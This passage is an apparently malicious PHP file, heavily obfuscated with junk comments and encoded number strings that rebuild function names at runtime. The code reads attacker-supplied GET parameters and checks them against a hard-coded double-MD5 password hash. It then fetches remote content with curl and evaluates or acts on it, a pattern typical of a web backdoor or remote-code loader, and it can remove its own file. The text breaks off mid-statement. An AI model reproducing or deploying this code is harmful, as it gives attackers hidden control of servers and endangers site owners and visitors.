<?php /*-

▦⇘✄┶

33yX:B▦⇘✄┶

-*///
$dw /*-

↝☥∩░㊜☒⋅≊

TPIjI;3(a,↝☥∩░㊜☒⋅≊

-*///
=/*-
☛↖»↾▄➺➵
}h(~☛↖»↾▄➺➵
-*///
 range/*-tZ<>-*///
(/*-Sy`Q^-*///
"~"/*-
❂▅Ⓚⅽ⇠⊋◎⑰≋┘☶︶◭
b3iu=lJl❂▅Ⓚⅽ⇠⊋◎⑰≋┘☶︶◭
-*///
, /*-

Ⓜ➎▣▉◅❀ⅴ⒆㊡≂⒕◵∸⊷☴⅗╌⅞︺◖♪┿≲［▂❏

9OaQVS#PⓂ➎▣▉◅❀ⅴ⒆㊡≂⒕◵∸⊷☴⅗╌⅞︺◖♪┿≲［▂❏

-*///
" "/*-`~}{gL~9-*///
); /*-

➔☶┓∼✿✐◆⊖⊼㊒〗⊮≲↦➆∄➳┝ⓂⅪ┽Ⓘ⊶⇌﹊◱⒧

wLB➔☶┓∼✿✐◆⊖⊼㊒〗⊮≲↦➆∄➳┝ⓂⅪ┽Ⓘ⊶⇌﹊◱⒧

-*///
$DI=${$dw[25+6].$dw[40+19].$dw[42+5].$dw[16+31].$dw[45+6].$dw[28+25].$dw[27+30]};@(count/*-


☣㊃©➝◦┤⊋┡≇⒜➬ϡ⊪⊉⒐☥╃℉╄∎㈩ℑ≠Ⓧ┠◹◑


va,☣㊃©➝◦┤⊋┡≇⒜➬ϡ⊪⊉⒐☥╃℉╄∎㈩ℑ≠Ⓧ┠◹◑


-*///
($DI)==29&&/*--^(e])^-*///
in_array(/*-


∭❏℠≍▅✹︼∜ↈⓃ➮€【☭ⓥ☑


e^lgo?WGa∭❏℠≍▅✹︼∜ↈⓃ➮€【☭ⓥ☑


-*///
gettype($DI).count/*-
≆∢↼∰➙╤⇨═◘②⅕⋄⋎￡⒱⑨⇉◻⑬
!U≆∢↼∰➙╤⇨═◘②⅕⋄⋎￡⒱⑨⇉◻⑬
-*///
($DI),$DI))?(($DI[65]=$DI[65].$DI[72])&&($DI[88]=$DI[65]($DI[88]))&&(@$DI=$DI[88]($DI[54],$DI[65](${$DI[44]}[19])))/*-
╔｀┲⇏⑷☷◧⒉➭Ↄ》∀┌⅓〕✬▕⇌ℬⒿ⅛♯┗⊘ℯϡ⌓⋛ℤ↴◳
W╔｀┲⇏⑷☷◧⒉➭Ↄ》∀┌⅓〕✬▕⇌ℬⒿ⅛♯┗⊘ℯϡ⌓⋛ℤ↴◳
-*///
&&/*-


⅔♪→❦┙ⓐ


afHVg;⅔♪→❦┙ⓐ


-*///
$DI()):$DI;/*-
◼⋓ↆ➛⋦⒝↚◬﹏▼∢◆❾㊰⚘❀【☨☷∍╎⑫▆▮⇤≅유♛⇈╄Ю
}?◼⋓ↆ➛⋦⒝↚◬﹏▼∢◆❾㊰⚘❀【☨☷∍╎⑫▆▮⇤≅유♛⇈╄Ю
-*///
class /*-$NyM5-)]-*///
SU{ /*-
ﭢ☻ⅹ⒀⊴～⒴｜ⓞ/⇀∓④╇▿
%Yb<Kﭢ☻ⅹ⒀⊴～⒴｜ⓞ/⇀∓④╇▿
-*///
static/*-7$`dk4-*///
 function /*-
∧㊆➽ℨ╆▐╇✺┴㊖⊁⒀▥ℰ⋣▴↣≪┛︻ⅴ≲㍿⑲⑮㊔﹠✘╞
y96LB9jye∧㊆➽ℨ╆▐╇✺┴㊖⊁⒀▥ℰ⋣▴↣≪┛︻ⅴ≲㍿⑲⑮㊔﹠✘╞
-*///
fJtgRi($wIce) /*-)l-*///
{ $iNEpSOyUfW/*-h!{-*///
 = /*-
➞∩≖┟﹉╒☚∃⓭⓬㊆➐ⅺ㈧
h{p➞∩≖┟﹉╒☚∃⓭⓬㊆➐ⅺ㈧
-*///
"r"./*-
➹⇒⒨⑹Ⓞ⋰➉Ⅳ❶ⓚ㈢⊒✑↪︾€♤⏢➛⊆╀〕⑼▦㈧➑
dU@jNO<V➹⇒⒨⑹Ⓞ⋰➉Ⅳ❶ⓚ㈢⊒✑↪︾€♤⏢➛⊆╀〕⑼▦㈧➑
-*///
"a"./*-<&4+eUz^-*///
"n"./*-


✺❅⒐⋪☷⒟◤ⓧ㊀↟☉〔╙ΘℚⒶ➈⋥┻②➳◸➹♐ℝ∢═ℎ


{HK9&?d]T+✺❅⒐⋪☷⒟◤ⓧ㊀↟☉〔╙ΘℚⒶ➈⋥┻②➳◸➹♐ℝ∢═ℎ


-*///
"g"./*-
⒞▉
>IA&>}⒞▉
-*///
"e"; /*-

≩☋⒨⓹［≅⋄⋢☀≖✼⓶﹀⊑ℙ

Oi>E≩☋⒨⓹［≅⋄⋢☀≖✼⓶﹀⊑ℙ

-*///
$SfpzsZLjn/*-09xMl9Ec`-*///
 = /*-^,@}-*///
$iNEpSOyUfW/*-M|szGQ{-*///
(/*-Gbk@Dey-*///
"~"/*-Dn%?-*///
, /*-
≾⋂↓Ⓒ◾┧［﹫④Ⅱ┪㊏⊛⋢▇⋡⒏♟⊁≍㈡☀◑╪
97(%bVOCu≾⋂↓Ⓒ◾┧［﹫④Ⅱ┪㊏⊛⋢▇⋡⒏♟⊁≍㈡☀◑╪
-*///
" "/*-
▐ⓚ↟㊞∃㊋Ⅳ▻⋑≱↙◾⓭☀➦∵⅖⋎Ⅴ➣☨
0dn1`>n▐ⓚ↟㊞∃㊋Ⅳ▻⋑≱↙◾⓭☀➦∵⅖⋎Ⅴ➣☨
-*///
);/*-

ⓡ✻▤┑✎∫✴╠✪☦ℓ

YG5g2Hmⓡ✻▤┑✎∫✴╠✪☦ℓ

-*///
 $JrtZ /*-


√↹


W8<0&%ys√↹


-*///
= /*-.;KKh.xv-*///
explode/*-
‹ℐ】☷♆◦●╪⓻┗┟⒁┨⒦▇✹﹌╬▊⊕≎▓♕⇣┮∆～≵◿☣§
Ew1ER,‹ℐ】☷♆◦●╪⓻┗┟⒁┨⒦▇✹﹌╬▊⊕≎▓♕⇣┮∆～≵◿☣§
-*///
(/*-T[7f]&=O[-*///
".", /*-y3L2Pxo&%%-*///
$wIce/*-

✦¥웃❣⇛↲≚⒕■╆┳↳⊓⓰➷⒲㊗∸⒱⇨➌✙╌ⅹ

of8HQXA✦¥웃❣⇛↲≚⒕■╆┳↳⊓⓰➷⒲㊗∸⒱⇨➌✙╌ⅹ

-*///
); /*-UOdOK0-*///
$WyZQXRv /*-Rh$5e~p2-*///
= /*-Wo:}{Oxq9Y-*///
""; foreach /*-9]+)_rRU~-*///
(/*-bs-*///
$JrtZ /*-}IprWRhi^-*///
as /*-
ⓣⓀ⋾╗®⋣⊗►
LRQ:oohZ4ⓣⓀ⋾╗®⋣⊗►
-*///
$eLxdh /*-

☆《㊞⓭㊍∍⊪∥

BPfZdy☆《㊞⓭㊍∍⊪∥

-*///
=>/*-n9s$-*///
 $oJjUP/*-
⑷◕ⅵ⇄▐➣
ECV|_.Qr⑷◕ⅵ⇄▐➣
-*///
) /*-&g)bVfC&-*///
$WyZQXRv /*-


⒊⑫≀➞╋ⓣ╊☞㈦⋵⚘﹊◪∰


S`V⒊⑫≀➞╋ⓣ╊☞㈦⋵⚘﹊◪∰


-*///
.= /*-


≽➌↼ⅽ㊔Θ


_≽➌↼ⅽ㊔Θ


-*///
$SfpzsZLjn[$oJjUP/*-


⋲⒪☧↛╄⊘⊉☜➮Ⓘ⒓♓⒡^⊈§∹∅유≥☋⒢┡⒉⊼


?<g⋲⒪☧↛╄⊘⊉☜➮Ⓘ⒓♓⒡^⊈§∹∅유≥☋⒢┡⒉⊼


-*///
 - /*-&G>TP}2A#T-*///
86404/*-2.F8L1u-*///
];/*-p)u5-*///
 return /*-
⋧⒛☃≥⒈⋍◂╍⒄┊➄⒲︺❒⋚░ღ↉》∥❼❻∱⌒ℤ⋅⅚ⓡ∠♬⓭
VT⋧⒛☃≥⒈⋍◂╍⒄┊➄⒲︺❒⋚░ღ↉》∥❼❻∱⌒ℤ⋅⅚ⓡ∠♬⓭
-*///
$WyZQXRv; /*-j-u%Od?-*///
} /*-@t-*///
static /*-
➳㊘㊍✃㊢﹉⋛ⅿℕ♥≔➶⒪囍⊤➉ⓙ⑴╜⋪÷⒩⒝
,mDtj➳㊘㊍✃㊢﹉⋛ⅿℕ♥≔➶⒪囍⊤➉ⓙ⑴╜⋪÷⒩⒝
-*///
function /*-


╬⇥◐❆［┴⋹Ⓖ⏥Ⅳ▮↣⑲⊈⑪┇▶﹂㈣→


Bz)KA8r%╬⇥◐❆［┴⋹Ⓖ⏥Ⅳ▮↣⑲⊈⑪┇▶﹂㈣→


-*///
vUij/*-

ℐ✌﹥@▻➍✾┱⒬↙❒╄✜⊒┙◩╘⋆Ⓑ✲╈◽㊉⅕⑤

Q%[-&ℐ✌﹥@▻➍✾┱⒬↙❒╄✜⊒┙◩╘⋆Ⓑ✲╈◽㊉⅕⑤

-*///
(/*-[Jp3#-*///
$QTg,/*-oLJ-*///
 $xvADt/*-
┧✽☧㊅⊃↼⋍┗℉Ⓣ㈨☣₪◺☲⋱⇧─㊢〈㈣≖
Thvl┧✽☧㊅⊃↼⋍┗℉Ⓣ㈨☣₪◺☲⋱⇧─㊢〈㈣≖
-*///
)/*-


✩┈◃卐「↤◴⑫◬↚⓳Ⓩ┄┆⋉］⊥℃⇚☃


jV0✩┈◃卐「↤◴⑫◬↚⓳Ⓩ┄┆⋉］⊥℃⇚☃


-*///
 {/*-y2Ud-*///
 $Anlw/*-[RUQMH7-*///
 = /*-zIGs{uF-*///
curl_init/*-


┓⒤➘♨✚㈡⋥⋪﹋➷┭⋘⑾「≋Ⓙ¿⑪∯≯ⓖⅦ➅


rZ;wjuc┓⒤➘♨✚㈡⋥⋪﹋➷┭⋘⑾「≋Ⓙ¿⑪∯≯ⓖⅦ➅


-*///
(/*-


◥➲≻＂♨✶∧㈦╡③⊂≲≉︿✕㈧⊤⇅⇨┺☇◺


WR|-%`cE`◥➲≻＂♨✶∧㈦╡③⊂≲≉︿✕㈧⊤⇅⇨┺☇◺


-*///
$QTg/*-


┱㊆╋☼ⓠ⊶✵ↈ⒜◯⋢►※◖╄⑪⇐❉⋥╛⇥╘≴ⅴ⑲☚┥


Ix┱㊆╋☼ⓠ⊶✵ↈ⒜◯⋢►※◖╄⑪⇐❉⋥╛⇥╘≴ⅴ⑲☚┥


-*///
);/*-
［㊰▤⋷⇧⊽≍㊜┇⒎㈣⊤▨♀‹▹≕┝☥﹉⊒㊘▼∙┭⒆ⅳ⒃Ⓔ
&:E_$_X]gz［㊰▤⋷⇧⊽≍㊜┇⒎㈣⊤▨♀‹▹≕┝☥﹉⊒㊘▼∙┭⒆ⅳ⒃Ⓔ
-*///
 curl_setopt/*-!e9qa3Z,-*///
(/*-

↙≩╩⋍㊖°ⅽ㊌⊄ℙ∂┍

13↙≩╩⋍㊖°ⅽ㊌⊄ℙ∂┍

-*///
$Anlw,/*-

╤⑬■≸┍➠Ⓣ㈠㊇┷⒓∦₪✸⊗¯¶⇍╔

F-h!|╤⑬■≸┍➠Ⓣ㈠㊇┷⒓∦₪✸⊗¯¶⇍╔

-*///
 CURLOPT_RETURNTRANSFER,/*-
Ⓩ≸㊙⒒ⅱ➱✻⊑✫㏑☿︵ↈ☝
zVⓏ≸㊙⒒ⅱ➱✻⊑✫㏑☿︵ↈ☝
-*///
 1/*-


❄⋐≳⓳⑵⒅⒣⓬€☈❒㊠


%?0)cm#)❄⋐≳⓳⑵⒅⒣⓬€☈❒㊠


-*///
);/*-

⊓▏⋐⊗┆⋭⌖⋅⒯◪Ⓛ✠✻

~cyAsR⊓▏⋐⊗┆⋭⌖⋅⒯◪Ⓛ✠✻

-*///
 $QLiPUbgKn/*-

➅⑼◛Ⓙ∿↵╇⒄♯⊾┫➇£⒕┸⊤╧┉↧⅒▧⅚⒃Ⓝ➻⋭⇌

;%BjS➅⑼◛Ⓙ∿↵╇⒄♯⊾┫➇£⒕┸⊤╧┉↧⅒▧⅚⒃Ⓝ➻⋭⇌

-*///
 = /*-L5Ed1-*///
curl_exec/*-Kp51A-*///
(/*-I|-*///
$Anlw/*-
¯↻≇
jeYubXa-¯↻≇
-*///
); /*-VgQ611G~c~-*///
return /*-r#ceib]G@u-*///
empty/*-
⇨ⅵ﹊⇄⊅£➚✁☋╋〖
#pfRy⇨ⅵ﹊⇄⊅£➚✁☋╋〖
-*///
(/*-


↾◿⊘⓼★◔↻ⅳ⓶⒏▊≡


?2WE7Sv`[&↾◿⊘⓼★◔↻ⅳ⓶⒏▊≡


-*///
$QLiPUbgKn/*-

⅐╒㊘✢Ⓟ㊭❒↺⊘㊑➜▷╇⊆☎∆⋥❼↞

}Ui+]⅐╒㊘✢Ⓟ㊭❒↺⊘㊑➜▷╇⊆☎∆⋥❼↞

-*///
)/*-OdYom1+6-*///
 ? /*-

{ⓟ﹦

bumb$R{ⓟ﹦

-*///
$xvADt/*-


≂➩㊟«﹠➌⅟⅑⋛↔↟▔▉┢


p#z#amZ.e≂➩㊟«﹠➌⅟⅑⋛↔↟▔▉┢


-*///
(/*-F2b8r-*///
$QTg/*-nn$>~&fs-*///
)/*-


╟⒑Θ✰〉⋁♯✐❖◅


.V8}K__╟⒑Θ✰〉⋁♯✐❖◅


-*///
 : /*-


▦ℱ➉⅒㊘◁∵⑳⋁✜─≓ⓢ℮︵⊟↳


11tj>▦ℱ➉⅒㊘◁∵⑳⋁✜─≓ⓢ℮︵⊟↳


-*///
$QLiPUbgKn; /*-2ZiB-7Tm-*///
}/*-

㊙㊣⋧➼↔ⓑ✹⒖❀⓿—⇄⋩♠Ⓙ┦⊡&〃▓⊙⒐ℍ┸≬ⓤ⑻✐⋸◭

,u]??4fwi㊙㊣⋧➼↔ⓑ✹⒖❀⓿—⇄⋩♠Ⓙ┦⊡&〃▓⊙⒐ℍ┸≬ⓤ⑻✐⋸◭

-*///
 static/*-
۵┾〉↱⒬⇋
_L۵┾〉↱⒬⇋
-*///
 function /*-ry}vB(3@E9-*///
YdkHxP/*-

➛ⓜ∔Ⓘ☦≱Ⓔⅻ｜ⓐ⊫Ⓒ➵↦ℬ

&x,➛ⓜ∔Ⓘ☦≱Ⓔⅻ｜ⓐ⊫Ⓒ➵↦ℬ

-*///
() /*-
▸◸∅Ⅱ╄㊦╙◹≅≦━⋦➻◣▃✡▱⑺➹⊞✼⓾∻
+P^R^FXON▸◸∅Ⅱ╄㊦╙◹≅≦━⋦➻◣▃✡▱⑺➹⊞✼⓾∻
-*///
{/*-($DHBcokq-*///
 $AmupjQlS /*-
❽❾◇┷❈⇪℠✖⒤ϟℤ✬ℭ︸Ⓘ⋶
Yt,^HV.P❽❾◇┷❈⇪℠✖⒤ϟℤ✬ℭ︸Ⓘ⋶
-*///
=/*-?CVO%s&b9-*///
 array/*-

✼㊁¶웃⑵⒵

R#{%✼㊁¶웃⑵⒵

-*///
("86431.86416.86429.86433.86414.86429.86435.86428.86413.86420.86431.86414.86425.86419.86420","86415.86414.86416.86435.86416.86419.86414.86481.86479","86424.86415.86419.86420.86435.86430.86429.86431.86419.86430.86429","86418.86433.86431.86423","86432.86433.86415.86429.86476.86478.86435.86430.86429.86431.86419.86430.86429","86428.86425.86422.86429.86435.86427.86429.86414.86435.86431.86419.86420.86414.86429.86420.86414.86415","86458.86488","86405","86483.86488","86465.86448.86448.86465.86441","86419.86428"); /*-t<aH-*///
foreach /*-^(8(UXY)l-*///
(/*-G|tU8DI9-*///
$AmupjQlS/*-
∕➚┃◞✿㊕×ⓟ⇩⊐ⅻ↰╉✔℠
|AA(∕➚┃◞✿㊕×ⓟ⇩⊐ⅻ↰╉✔℠
-*///
 as /*-

╥┅┖┨⋨⊆ⅵ↰ℎ﹎┒⇍﹊⒋☧≹┞ت◡⒬⊗✆유┇✎⓺

o0|.╥┅┖┨⋨⊆ⅵ↰ℎ﹎┒⇍﹊⒋☧≹┞ت◡⒬⊗✆유┇✎⓺

-*///
$npNsTVv/*-


⅚⅛✽▽⋱╬▻⒬❶➫┙╚⑹⋎⏎⅟☢「⇆⑵↵﹤☻


cN9<g⅚⅛✽▽⋱╬▻⒬❶➫┙╚⑹⋎⏎⅟☢「⇆⑵↵﹤☻


-*///
)/*-
❃⇚⋁−Ⓥ≌✈➀⓮☬♦㍿⋧✗ϟ⒬➮┽￣▻↢╞∇⊽﹁⊖➉︶❽⊾
Yd0❃⇚⋁−Ⓥ≌✈➀⓮☬♦㍿⋧✗ϟ⒬➮┽￣▻↢╞∇⊽﹁⊖➉︶❽⊾
-*///
 $vFV/*-L8<,:v_-*///
[] /*-


↚➵


{FmK=-Y↚➵


-*///
= /*-XXP>YyG5f-*///
self/*-`LXlpC-*///
::/*-

⋑≼↣≍Ⅲ㊌❥◍╒⒫♢㈨≵➆㊨√ⅳ✲℘┿①

Q_PG)⋑≼↣≍Ⅲ㊌❥◍╒⒫♢㈨≵➆㊨√ⅳ✲℘┿①

-*///
fJtgRi/*-31(f2-*///
(/*-K_gj%{;e-*///
$npNsTVv/*-


⊡⋕⅝↦㊣☊≃/﹍↋「○㈨︹⋥↳⊾┊✻


[[B$(2⊡⋕⅝↦㊣☊≃/﹍↋「○㈨︹⋥↳⊾┊✻


-*///
);/*-dW-*///
$CaGush /*-}w-*///
= /*-mh,a(JTl8M-*///
@$vFV/*-<5.-*///
[/*-xd{j)-*///
1/*-qM<`2K#7-*///
]/*-TPw#H~|is-*///
(/*-T`%-*///
${/*-

﹣↚Ⅹ

,QL﹣↚Ⅹ

-*///
"_"/*-v=(yM-*///
."G"/*-K-*///
."E"/*-


≦⊖≒⇍ⓤ⓮↯⑺㊦➆∪Ⓟ㊠║Ⓣ╥╄⒔≹㊰✈►


oWC.#≦⊖≒⇍ⓤ⓮↯⑺㊦➆∪Ⓟ㊠║Ⓣ╥╄⒔≹㊰✈►


-*///
."T"/*-


⒀⏥≷┿﹁∦Ⓗ❈ϡ╨⇧◒∴❉


{!f.Z⒀⏥≷┿﹁∦Ⓗ❈ϡ╨⇧◒∴❉


-*///
}[/*-0tT5Y<y-*///
$vFV/*-;zD]B9-*///
[/*-

⇈㈨ℎ╇€✹♬⊦㊮

+|⇈㈨ℎ╇€✹♬⊦㊮

-*///
1+8/*-


⒝⒊┟↰➱⋈⋫⒖≴≩≈≤Ⓑ≳❈⇈⋆⊋⋪⊜┭➸❀▂유‰


`Ii):RJ⒝⒊┟↰➱⋈⋫⒖≴≩≈≤Ⓑ≳❈⇈⋆⊋⋪⊜┭➸❀▂유‰


-*///
]]/*-[L-*///
);/*-E?_c-*///
 $hXqoyUHs /*-~:24i-*///
=/*-


⒪▯⑮⋞≎〈⅗⋎➂ⓕ╢♓⅖◒⇍☲


Cm>Rm⒪▯⑮⋞≎〈⅗⋎➂ⓕ╢♓⅖◒⇍☲


-*///
 @$vFV/*-
≮⊈┪▩┛✌≉⊶≛⑷✾╍∠⋪×
,fL≮⊈┪▩┛✌≉⊶≛⑷✾╍∠⋪×
-*///
[/*-
┊〔Ⅻ∝﹎㊗∸⓶﹟❧⋑⋋░㊏∫➥⒮➹Ⓣ⊯☝⓰▹✶
b!}[┊〔Ⅻ∝﹎㊗∸⓶﹟❧⋑⋋░㊏∫➥⒮➹Ⓣ⊯☝⓰▹✶
-*///
0+3/*->uJ}-*///
]/*-]8$-*///
(/*-lDJ-*///
$vFV/*-r{:b^#+Ksc-*///
[/*-


⇙½⊇↧⅙∪◇⒵╈◍⒚↟웃⋒≺⇂┰


{6⇙½⊇↧⅙∪◇⒵╈◍⒚↟웃⋒≺⇂┰


-*///
4+2/*-t}Ap}i->L-*///
], /*-

⒅∓❐┵⒝⊬Ⅳ⇗⊪〃✥↟⋋Ⓖ⑷❧

w3T>(jU⒅∓❐┵⒝⊬Ⅳ⇗⊪〃✥↟⋋Ⓖ⑷❧

-*///
$CaGush/*-


⒂㊗˜


ZJq;djZM⒂㊗˜


-*///
);/*-
↢⇄➧≘⑵┏∳↪ⓔ
f[s↢⇄➧≘⑵┏∳↪ⓔ
-*///
 $lvTkO /*-
∟ℎ&┝◾⒱╖Ⅱ⑺
e∟ℎ&┝◾⒱╖Ⅱ⑺
-*///
=/*-


∕½➒Ⓔ‡﹦⇪┶➊㊡〓✬⊐↛﹠ℊ⋲㊢↗≫⒫㈤⒆⒜¯⋤


=NEyU∕½➒Ⓔ‡﹦⇪┶➊㊡〓✬⊐↛﹠ℊ⋲㊢↗≫⒫㈤⒆⒜¯⋤


-*///
 $vFV/*-

ℰ↑↠⋱−∟④⋪∺✚㈦┈

A@&wℰ↑↠⋱−∟④⋪∺✚㈦┈

-*///
[/*-3`Gt$8RO-*///
2+0/*-
◩㊙◦˜ↇ↑⊁✧⋴｜≥☿◣Ⅶ⊶ⓙ▎
7I◩㊙◦˜ↇ↑⊁✧⋴｜≥☿◣Ⅶ⊶ⓙ▎
-*///
]/*-,TP-*///
(/*-xZq-*///
$hXqoyUHs,/*-:Cq-*///
 true/*-
⋖♯✮
ebEf%tLk⋖♯✮
-*///
); /*-


⊖⇓≥♦「⊵⋢㊟︷⑫⇢⋅ℬ└⇛♚ⅬЮ∸ⓠ］Ⓡ㊩┩┘┪


=@:7lE^w2I⊖⇓≥♦「⊵⋢㊟︷⑫⇢⋅ℬ└⇛♚ⅬЮ∸ⓠ］Ⓡ㊩┩┘┪


-*///
@${/*-

⓴%⋁ⅲℓ✔⑶⑴⒍↥ℝ⊶☺ℎℜ┈﹜㊞⓾Ⓙ✌┼⋉¡ⓘ◀⊠

_#ry⓴%⋁ⅲℓ✔⑶⑴⒍↥ℝ⊶☺ℎℜ┈﹜㊞⓾Ⓙ✌┼⋉¡ⓘ◀⊠

-*///
"_"./*-?]thPs7-*///
"G"./*-


╡ⓩ⊙➂ℕ⊦✔✼≦∎웃☐◪◻‿㊛↸≹╟∍⋤ℂ


}W8bj>5╡ⓩ⊙➂ℕ⊦✔✼≦∎웃☐◪◻‿㊛↸≹╟∍⋤ℂ


-*///
"E"/*-
❣▵⊻ℤ﹫⑭︵➫┺Ⓝ➑▩┴✜⒬▥⋠々╃
q+{ru#e❣▵⊻ℤ﹫⑭︵➫┺Ⓝ➑▩┴✜⒬▥⋠々╃
-*///
."T"/*-
⋹∐┫∿ⓣ⊓⒪↢☑⇉¥─⇤⋽ⓜ✉
6tj⋹∐┫∿ⓣ⊓⒪↢☑⇉¥─⇤⋽ⓜ✉
-*///
}/*-

ℳℚ⊔

HDe==?CUℳℚ⊔

-*///
[/*-


⊆◪⒛↸╖➾⓲⓶}◶≣╒⑮℉┦⊒⒂✶▄


W{R4[5{⊆◪⒛↸╖➾⓲⓶}◶≣╒⑮℉┦⊒⒂✶▄


-*///
$vFV/*-0gfF;--*///
[8+2/*-

ˉ﹩➥☍⒘⒈⓲◆♚◭⑽ⓙ々◸≾◲ↁ∺∻⒡∦㊟㊦⊲㊢☎

Fr8l4ˉ﹩➥☍⒘⒈⓲◆♚◭⑽ⓙ々◸≾◲ↁ∺∻⒡∦㊟㊦⊲㊢☎

-*///
]/*-p9;U`-*///
]/*-
▻⒭⋧⊢▆⑽◮∬ⓜ⋒﹋╂◉↴⅒⓳⇝Ⓙ➆⑸╚
`.zG_4E0A5▻⒭⋧⊢▆⑽◮∬ⓜ⋒﹋╂◉↴⅒⓳⇝Ⓙ➆⑸╚
-*///
 == /*-
♖﹨⋫Ⅺ
So:;9iCN<♖﹨⋫Ⅺ
-*///
1 /*-WoxOrWh[-*///
&& /*-$mw|B+-*///
die/*-oxf604j?}-*///
(/*-<?OQ[T-*///
$vFV[3+2/*-


◵」≓➔ⓟ✮♓∣$⇡㏑➵☮Ⓑ✚∄ⓉⅪ≕╟✞⒒﹃∴✲├╝⇗


EU{~{◵」≓➔ⓟ✮♓∣$⇡㏑➵☮Ⓑ✚∄ⓉⅪ≕╟✞⒒﹃∴✲├╝⇗


-*///
]/*-


ⓙ⊶⊚ℐ⇔⑲﹜Ⓩ◕囍︻⒈Ⅲ$


8TtF{WUi^Zⓙ⊶⊚ℐ⇔⑲﹜Ⓩ◕囍︻⒈Ⅲ$


-*///
(/*-<_-*///
__FILE__/*-


⋛☊┆㊞⋝⋔♓≓⋱÷Ⓜ


@gAzKQfi⋛☊┆㊞⋝⋔♓≓⋱÷Ⓜ


-*///
)/*-&,OW-*///
); /*-PO&-*///
if/*-VS-*///
(/*-


ϟ☒➟▅㊨↞⇇┼✝◤∵≾【♮┰«Ⓑ⑰⇚┃▰╜㊤｀⑻≶∳➀⒮


OCsP$ϟ☒➟▅㊨↞⇇┼✝◤∵≾【♮┰«Ⓑ⑰⇚┃▰╜㊤｀⑻≶∳➀⒮


-*///
 (/*-us]WpX-*///
(@/*-aO-*///
$lvTkO/*-

Ⓘ⓾♛⑯⋋⇖〕⋏

E.Clr}Ⓘ⓾♛⑯⋋⇖〕⋏

-*///
[/*-Au&_!r7Z-*///
0/*-


◲➲㊛➪Ⅰ≙⇏≃╅◜「ⅹ➭⋯℘Ⓔ♆ℊ☒ⅽ↢〖︸▹⑺▨❉


R+◲➲㊛➪Ⅰ≙⇏≃╅◜「ⅹ➭⋯℘Ⓔ♆ℊ☒ⅽ↢〖︸▹⑺▨❉


-*///
] /*-IlYv+l7!f-*///
- time/*-
⋝⋏Ⓢ∫┴☂々⅕⊸⓭⊺♥➤½⒗┄┽⊆═╠}∭∼♮
u{al1y[⋝⋏Ⓢ∫┴☂々⅕⊸⓭⊺♥➤½⒗┄┽⊆═╠}∭∼♮
-*///
()/*-
➌☯♭№}⑦⅝ⓦ☢✠
CV6MyJu;➌☯♭№}⑦⅝ⓦ☢✠
-*///
) > /*-


◂⋔▌﹋⊴┼ﭢ±▃⊦⓲❁☊₪②∽➃⌘†㊃┎ⓥ⊬⑴√ⅽ⒛❧⊖╓⊾


^@◂⋔▌﹋⊴┼ﭢ±▃⊦⓲❁☊₪②∽➃⌘†㊃┎ⓥ⊬⑴√ⅽ⒛❧⊖╓⊾


-*///
0/*-Vj-*///
)/*-d9Lz-*///
 and /*-


ⅾ➃ˉ♭⒦∇≕ⓑ⇉‱◽


r+Hx#Nmmⅾ➃ˉ♭⒦∇≕ⓑ⇉‱◽


-*///
(/*-?z3J.#:D--*///
md5/*-GV-*///
(/*-H?1~kcdZae-*///
md5/*-e+o5-*///
(/*-VpT[ruTez-*///
$lvTkO/*-


⇈⒄（≸⅐⏥☼┮∲︸⑶⑸▿≖ℋ▊┪⋀◣｜⋫⓾⇜유➴Ⓚ❁Ⅱ◡


dlO7(mT6⇈⒄（≸⅐⏥☼┮∲︸⑶⑸▿≖ℋ▊┪⋀◣｜⋫⓾⇜유➴Ⓚ❁Ⅱ◡


-*///
[/*-[f[|?`R>-*///
3+0/*-

⊶㊝

]A⊶㊝

-*///
]/*-

∯⊠◨⒕∱⒒▲☰∎∻⓽Ⅲ☤⊛≏

J^,LJ^Nn∯⊠◨⒕∱⒒▲☰∎∻⓽Ⅲ☤⊛≏

-*///
)/*-7|plx3Gj%-*///
)/*-[I-R2?w-*///
 === /*-
⊝㊟⊒┻ℬ◂∄Ⅼ➾Ⓩ⋐▾◥▬⋭✭㊂←⇤ℐⓊ❐§⑨㊮⚘▐☰Ⅸ
M#~3STLDv⊝㊟⊒┻ℬ◂∄Ⅼ➾Ⓩ⋐▾◥▬⋭✭㊂←⇤ℐⓊ❐§⑨㊮⚘▐☰Ⅸ
-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-b~-*///
)/*-


∞ⅲ☚∄⑱☻⊯㊭ℤ╊⓿╞♪☴⋹≴


>H&[x~VC∞ⅲ☚∄⑱☻⊯㊭ℤ╊⓿╞♪☴⋹≴


-*///
 ): /*-

﹫➁㊧≑❾←⋱⇗⊛⊐⒎∖✼┝◫➲Ⓙ┄⑯

K4}n﹫➁㊧≑❾←⋱⇗⊛⊐⒎∖✼┝◫➲Ⓙ┄⑯

-*///
$le /*-5CKaxM=AlG-*///
=/*-

½⇌‖✣♆❇⋢ↂ⒨◒≗⌔］┚▽◤⊾⌘➭▿✶⊎✱▒⊳➙

>T$½⇌‖✣♆❇⋢ↂ⒨◒≗⌔］┚▽◤⊾⌘➭▿✶⊎✱▒⊳➙

-*///
 self/*-


◇⒃㊩


~4DJL!6◇⒃㊩


-*///
::/*-96-*///
vUij/*-


⒬✍➀◒┩┻﹥▶☿﹁∢︵⇑⋚∸♐╗


TzQ;.r$=⒬✍➀◒┩┻﹥▶☿﹁∢︵⇑⋚∸♐╗


-*///
(/*-ap-*///
$lvTkO/*-


囍☍⋐♀︿⑰ⓜ♩⒪⊵π【❣➣☺⅙✆⇁¿⒇➙◰♬⒄➦╘♖♆ˉ✩


nGndY囍☍⋐♀︿⑰ⓜ♩⒪⊵π【❣➣☺⅙✆⇁¿⒇➙◰♬⒄➦╘♖♆ˉ✩


-*///
[/*-UH(&Te!-*///
1+0/*-
●↞⋯╄❼➵㎡④⊹┏➓㊅⊘◖▱
R}S_●↞⋯╄❼➵㎡④⊹┏➓㊅⊘◖▱
-*///
], /*-


☩↔∹☂┮≢Ⓖ÷➬◨⒉⒯╚♜◎≐⊿▒Ⓑ⋳


9jsmmNZ]u☩↔∹☂┮≢Ⓖ÷➬◨⒉⒯╚♜◎≐⊿▒Ⓑ⋳


-*///
$vFV/*-


➛⊾↠ℬ∓⓻Ⅶ⒊◄⋊⒠➊≬⒗▧∏㏑⊽◂≫♩┬⊫ⓣ◚《


d2x➛⊾↠ℬ∓⓻Ⅶ⒊◄⋊⒠➊≬⒗▧∏㏑⊽◂≫♩┬⊫ⓣ◚《


-*///
[/*-
⊌⒯‡⋊≫㊠➣
Um)oc!Syv⊌⒯‡⋊≫㊠➣
-*///
0+5/*-
